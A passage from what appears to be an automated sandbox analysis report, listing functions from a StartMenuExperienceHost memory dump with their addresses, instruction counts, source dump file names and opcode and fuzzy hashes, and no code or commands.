                                                                  • Opcode ID: a691bfa67e8ec2d0f17bb8b28c15bd847bbae17caca1e77766fa7c06d17db77d
                                                                  • Instruction ID: de8009af8d9913e02874264d2caf3fa8d5d91c2768553706d940ea5445975b9c
                                                                  • Opcode Fuzzy Hash: a691bfa67e8ec2d0f17bb8b28c15bd847bbae17caca1e77766fa7c06d17db77d
                                                                  • Instruction Fuzzy Hash: C431803160C9598FDB99FF28C495EA5B3E1FBA931470406ADD04ED7292DF28E885CB81
                                                                  Function 00007FF8492D987D Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7668ff27c359efb0c970383dda84aec6dbfdd58dddf0cb56b28c5df0433b8b27
                                                                  • Instruction ID: 536b11099a64f96db5076c39a444cb872b995400d239b335a6604de71b2c9835
                                                                  • Opcode Fuzzy Hash: 7668ff27c359efb0c970383dda84aec6dbfdd58dddf0cb56b28c5df0433b8b27
                                                                  • Instruction Fuzzy Hash: D6318131A1C96A5FEB58EE1CD4909B8B7A5FF49750B044279D11ED3282DF24B8128B80
                                                                  Function 00007FF8492DC515 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95b0e28015a2981b7bb1ddb0a9eceaffa9a7a1fb07746e785b4b40c2b4fdb454
                                                                  • Instruction ID: 392c601c6fc585c347fafc634aee7d23cff47d5e619b57be412213039222ee06
                                                                  • Opcode Fuzzy Hash: 95b0e28015a2981b7bb1ddb0a9eceaffa9a7a1fb07746e785b4b40c2b4fdb454
                                                                  • Instruction Fuzzy Hash: 4C313B30D1C5AACFFB68EF5484515BD7BB5FF54380F5002BAD02EE6191DEB869409B81
                                                                  Function 00007FF8492D1CC0 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58c64bc10f9e96505ffe6180fcc0517676de88c95d94625c421a5f41520183f2
                                                                  • Instruction ID: c60570d928f8645536f6cc60c77c2f72d961f5e4a6e73ea254ce681098b00095
                                                                  • Opcode Fuzzy Hash: 58c64bc10f9e96505ffe6180fcc0517676de88c95d94625c421a5f41520183f2
                                                                  • Instruction Fuzzy Hash: 92312810D1D5E64EF37EF61844609747BA5EF9235072847F9C0AA9B8DBDB6CA8818341
                                                                  Function 00007FF8492DB400 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d56beec1bc681feb4dd02cd7fc1f829325af655d733ab97522c92b4ef5214b9
                                                                  • Instruction ID: 0332d06018c6f1a6cec3b3ef9a383cf0b962dbdf1dde10eaeadcd21f996ab413
                                                                  • Opcode Fuzzy Hash: 7d56beec1bc681feb4dd02cd7fc1f829325af655d733ab97522c92b4ef5214b9
                                                                  • Instruction Fuzzy Hash: 67310B1081C5F64EF779DB1484705B57B69EF9231171843B6C4A6CB497C96CA889C391
                                                                  Function 00007FF8492D884E Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c061df7ad379cc41f4bda50a21581268623c6698045f6085f75825b0547daf2c
                                                                  • Instruction ID: 80cfaedbf8434212ad995a77fed118dc23816794dbe67793570eecdf32a8a679
                                                                  • Opcode Fuzzy Hash: c061df7ad379cc41f4bda50a21581268623c6698045f6085f75825b0547daf2c
                                                                  • Instruction Fuzzy Hash: 47113A30E1855D9FEB98EB68D855ABDB7B1FF98310F0001BED10EE3691CE75A9808B40
                                                                  Function 00007FF8492D023E Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2489691d01806918a534e00c3182cba8c7e4dc23b9045f3d6e1d4b97808c71d2
                                                                  • Instruction ID: c67d609296f33a98196dc7551e22903fc2c9bea361ec1bb6dcd702ad8f947d37
                                                                  • Opcode Fuzzy Hash: 2489691d01806918a534e00c3182cba8c7e4dc23b9045f3d6e1d4b97808c71d2
                                                                  • Instruction Fuzzy Hash: 1901D631A4DA884FEB59FBA8A4516ACBBA1EF46351F44017AD04AC71D3DA2958468350
                                                                  Function 00007FF8492DA32E Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ddeaef893b5151447abf4de867ccd339a2d100ef6800349f3d1846080563a40
                                                                  • Instruction ID: 68c9717901d8658d23d8f862a1c3a3b5396228f520a61791291a9d87a4777190
                                                                  • Opcode Fuzzy Hash: 6ddeaef893b5151447abf4de867ccd339a2d100ef6800349f3d1846080563a40
                                                                  • Instruction Fuzzy Hash: 8F11663020C6CA4FF706DB28D4547E83B92DF83350F1806AED55AC72D3C969A999C350
                                                                  Function 00007FF8492D0D6C Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86db71c23e0572e0aa74b372a9dd10f2e4117fb53a40f5261a167ccda0feb3d9
                                                                  • Instruction ID: 0c52356333392d2eecbd491ca9c606828d90394fcad2c9122d98dfcbdbcbddd1
                                                                  • Opcode Fuzzy Hash: 86db71c23e0572e0aa74b372a9dd10f2e4117fb53a40f5261a167ccda0feb3d9
                                                                  • Instruction Fuzzy Hash: B501456014F7E22FC3026B745C0A8AEBF60DE036A074809EFD1C68B4E3C508101ED3E2
                                                                  Function 00007FF8492DA4BD Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db07b266b57be2af03b5cef39a71d2f87f67b75c85fefaae3012a59446adc63e
                                                                  • Instruction ID: bd15c0a2e4ecd9bb7d63c68493a6b98bcfd51c163cdb506cd15026e463c2da52
                                                                  • Opcode Fuzzy Hash: db07b266b57be2af03b5cef39a71d2f87f67b75c85fefaae3012a59446adc63e
                                                                  • Instruction Fuzzy Hash: ED016B20A1DAC91EEB51FB3440106B93F91DF46240B4406BAD08EC71C3CD1CB90EC3A1
                                                                  Function 00007FF8492DE862 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42d44d14fb5f330205411b52fc6605ca80d1cbb1e1b13f0fbc9f1528950a3709
                                                                  • Instruction ID: 0d210b56281667ac034848c90b615d4b5f51a85920936fd9385743e9fa05c5b3
                                                                  • Opcode Fuzzy Hash: 42d44d14fb5f330205411b52fc6605ca80d1cbb1e1b13f0fbc9f1528950a3709
                                                                  • Instruction Fuzzy Hash: 44119070A1886DDFDFA8EF88D494AEDBBB1FF58344F500129D00AE3290CA65A9418B90
                                                                  Function 00007FF8492D80FF Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2940ca5c89f70fb02b1e653de0d62f1515bfe9bc23822c7d4801ffc921efbe4
                                                                  • Instruction ID: 5ad6bb6fa24899b77f6da264187cf41cb21cff7f6915d2e6d619cea61989a332
                                                                  • Opcode Fuzzy Hash: b2940ca5c89f70fb02b1e653de0d62f1515bfe9bc23822c7d4801ffc921efbe4
                                                                  • Instruction Fuzzy Hash: 54F0F63170CA484FE75CEB2C68166BC37D2FF89220B15057FD18EC3666CD2498064781
                                                                  Function 00007FF8492D8B22 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a1e456b79d8f08428102da68900280253c079ce59e2915aeb65ed065dd138e9
                                                                  • Instruction ID: 1e86685c9585ced7f2241a605c0ba688425fb641dddaa2308f3d157013f58f00
                                                                  • Opcode Fuzzy Hash: 7a1e456b79d8f08428102da68900280253c079ce59e2915aeb65ed065dd138e9
                                                                  • Instruction Fuzzy Hash: 63F0F63184E3D69FE322EF7088524E97FB8EF03244F1801FAD055CB0A2C6AD5606C761
                                                                  Function 00007FF8492DA308 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9f3040dd0afe95c5603740cd0375636efdfe4deb9b8c58eec355e6bdc4a30fa
                                                                  • Instruction ID: ec68576ddd286d330d198da2ad180bbac5950fabf399a582e07cd3afe2235c26
                                                                  • Opcode Fuzzy Hash: a9f3040dd0afe95c5603740cd0375636efdfe4deb9b8c58eec355e6bdc4a30fa
                                                                  • Instruction Fuzzy Hash: 39F0E22090D6D7AEFBB26E105411ABC3B1A9FC2380F2416BAC59E820C2C88C29465392
                                                                  Function 00007FF8492D00DC Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72a41bcf13385af101e40b7a1316dedbd33f3ded579c48e26819dbd24c2feb38
                                                                  • Instruction ID: f5e17f7e83d54e617b017cbb93512831cb9f53246b739f0f5ca19bc825cc4728
                                                                  • Opcode Fuzzy Hash: 72a41bcf13385af101e40b7a1316dedbd33f3ded579c48e26819dbd24c2feb38
                                                                  • Instruction Fuzzy Hash: 0DC08C10E8E3D35FFB307AA808C403C1B504F06382B000732C016861E3EAAC38005364
                                                                  Function 00007FF8492D982F Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
                                                                  • Instruction ID: 3208bd7323e5e8b472099946a3374b6086a062e3478049aeede40c6bd2da76ea
                                                                  • Opcode Fuzzy Hash: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
                                                                  • Instruction Fuzzy Hash: 95C0484AE0E2E35EFB3129A0089107D16990F2B281B950672E62A8A1D3E89C6A055265